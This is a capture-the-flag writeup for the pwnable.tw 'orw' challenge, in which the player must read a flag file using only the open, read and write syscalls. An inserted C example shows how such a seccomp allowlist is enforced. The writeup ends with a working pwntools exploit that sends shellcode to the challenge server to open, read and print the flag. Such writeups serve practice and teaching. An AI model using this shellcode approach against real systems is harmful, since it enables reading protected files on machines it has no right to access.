Pwnable.tw orw Writeup


Challenge

Description

Read the flag from /home/orw/flag.
Only open read write syscall are allowed to use.


Solution

In short, the program executes whatever you send it,
but only the read/write/open syscalls can be used.
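To show how a syscall allowlist of this kind can be enforced, here is an added C example that is not part of the original writeup or the challenge binary. It assumes the restriction is implemented with a seccomp-BPF filter, which the page does not state; `install_orw_filter` and `probe_filtered_child` are hypothetical names, and `openat` and `exit_group` are additionally allowed so that libc wrappers and process exit keep working.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <stddef.h>
#include <unistd.h>
#include <sys/prctl.h>
#include <sys/syscall.h>
#include <sys/wait.h>
#include <linux/filter.h>
#include <linux/seccomp.h>

/* Two BPF instructions: allow the call if its number equals nr. */
#define ALLOW(nr) \
    BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, (nr), 0, 1), \
    BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW)

/* Allowlist: read, write, open/openat, exit_group pass; the rest get EPERM.
 * Host syscall numbers only; a production filter also checks seccomp_data.arch. */
static int install_orw_filter(void) {
    struct sock_filter f[] = {
        BPF_STMT(BPF_LD | BPF_W | BPF_ABS, offsetof(struct seccomp_data, nr)),
        ALLOW(__NR_read), ALLOW(__NR_write), ALLOW(__NR_openat),
#ifdef __NR_open
        ALLOW(__NR_open),
#endif
        ALLOW(__NR_exit_group),
        BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ERRNO | EPERM),
    };
    struct sock_fprog prog = { .len = sizeof f / sizeof f[0], .filter = f };
    if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0) != 0) return -1;
    return prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &prog);
}

/* Filter a forked child and return what it observed: bit 0 = write/read on
 * a pipe worked, bit 1 = getpid was refused with EPERM; -1 on setup failure. */
static int probe_filtered_child(void) {
    int p[2], status, r = 0; char c = 0;
    if (pipe(p) != 0) return -1;
    pid_t pid = fork();
    if (pid == 0) {
        if (install_orw_filter() != 0) _exit(4);
        if (write(p[1], "x", 1) == 1 && read(p[0], &c, 1) == 1 && c == 'x') r |= 1;
        if (syscall(SYS_getpid) == -1 && errno == EPERM) r |= 2;
        _exit(r);
    }
    close(p[0]); close(p[1]);
    if (pid < 0 || waitpid(pid, &status, 0) != pid || !WIFEXITED(status)) return -1;
    return WEXITSTATUS(status) == 4 ? -1 : WEXITSTATUS(status);
}

int main(void) { return probe_filtered_child() == 3 ? 0 : 1; }
```

A filter like this limits which syscalls run but not what they touch: any file the process can open and read remains reachable, so file permissions still matter.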

Exploit

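from pwn import *

context.arch = "i386"
r = remote("chall.pwnable.tw", 10001)

# Generate the shellcode with shellcraft:
# open the flag file, then read and output 50 bytes
sc = asm(
    shellcraft.i386.linux.open(b'/home/orw/flag') +  # the file descriptor is returned in eax
    shellcraft.i386.linux.read('eax', 'esp', 50) +   # read 50 bytes onto the stack
    shellcraft.i386.linux.write(1, 'esp', 50)        # write them to stdout (fd 1)
)

# Send the shellcode at the prompt and print the reply up to the flag's closing brace
r.sendlineafter(b':', sc)
print(r.recvuntil(b'}'))

r.interactive()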